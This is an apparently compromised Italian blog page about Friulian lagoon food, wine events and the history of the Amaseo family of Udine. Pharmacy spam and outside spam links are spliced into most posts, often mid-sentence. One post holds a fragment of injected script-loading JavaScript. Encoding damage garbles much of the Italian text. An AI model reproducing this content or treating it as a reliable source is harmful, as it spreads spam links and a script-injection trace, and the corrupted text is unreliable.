La cultura si mangia!

B Nell’ ambito del convegno La cultura si mangia! Il cibo come patrimonio culturale. In pescaria vecia si è tenuto il convegno: Oggi parliamo di pesce. Le novità legate al Bisato in speo: Entra »

Valerio Ghin

Purchase d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s); http://rarespanta.ro/how-much-does-endep-cost/ buy differin gel cost of pilex tablets purchase micronase medication Purchase intlo illalu vantintlo priyuralu telugu movie online veoh cymbalta 60 mg street price cephalexin acne Entra »

Serata con le Piume di Laguna e i Cru di Ronchi di Cialla

Venerdi 19 o 26 Aprile Degustazione con Le Piume di Laguna !!! Millefoglie con PatA? di Alzavola Anguilla affumicata e Mela verde Caramellata , Petto di Germano Reale con Lardo di Colonnata Entra »

TURISMO/ENOGASTRONOMIA: I FONDAMENTI DELLA CUCINA TIPICA DEL TERRITORIO DELLA RIVIERA FRIULANA

order suprax antibiotic used to treat buy tadalista 20 LE BASI GETTATE NEL CONVEGNO ‘LEGATO AL 5.PREMIO GIORNALISTICO ‘VALERIO GHIN’ A MARANO LAGUNARE (UD) TRE LE AREE DEI SAPORI INDIVIDUATE: DEL GRADESE, Entra »

RIVIERA FRIULANA: CONFERMA DEL MATRIMONIO TRA IL PESCE DI PREGIO CRUDO E NON SOLO, E I VINI RIVIERASCHI

Ancora azzeccato il connubio rivierasco, a Marano Lagunare (UD), tra i cibi a base di pesce adriatico, e i vini della Riviera Friulana. Attori, gli animatori della Compagnia del bisato, confraternita che Entra »

Daily Archives: 17 gennaio 2013

COGNOME AMASEO, LETTERATI FRIULANI

cheap aldactone 25

Il cognome viene dalla forma piA? antica e letteraria del nome Tommaso di cui A? la cognominizzazione. Deriva dal latino ecclesiastico Thomas, dallai??i??ebraico Toamm, nel significato comune di ai???gemelloai??i??. Il capostipite Tommaso giunse nel XIV secolo in Friuli dalla Toscana, regione dallaAi?? quale era fuoriuscito in seguito alle note vicende storiche con i fiorentini. La famiglia si fermA? a Udine dove sviluppA? un fiorente commercio artigianale, a tal punto che il suo capostipite nel XIV secolo entrA? a far parte del governo della cittAi??. I discendenti divennero insigni letterati e storiografi, grazie anche ai contatti che tennero con i piA? grandi letterati italiani del XVI secolo. Scrissero i cruenti fatti ne Cheap La crudel zobia grassa, del http://ty9952.blogcn.com/?p=1064 giovedAi?? grasso friulano del 1511,Ai?? in cui raccontarono lo scempio che i rivoltosi fecero dei nobili friulani. Uno degli Amaseo, Gregorio, Pills letterato e insegnante di Lettere nelle scuoleAi?? di Udine ebbe una singolare avventura con la suora Fiore o Flora di Marano, monaca della fine del Quattrocento alle Clarisse del conventoAi?? (oggi Liceo linguistico-pedagogico Uccellis). Quali fossero i suoi avi, alla luce delle attuali ricerche non A? dato sapere, perA? a metAi??Ai?? Quattrocento vi furono nobili che possono aver avuto parte in causa: il nobile Giacomo di Marano dAi?? 650 ducati di dote alla sorella Dorotea, sposa del nobile Brachino di Gemona; vi A? anche Jacopo Gordino che ha contatti con i nobili Nicolossio di Brazzacco; nel XV sec. abitavanoAi?? a M. ancheAi?? i nobili Pasini di Cividale. Si puA? ipotizzare che avessero mandato la figlia femmina in convento per non dividere il patrimonio immobiliare , consegnandolo ad un unico figlio.

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo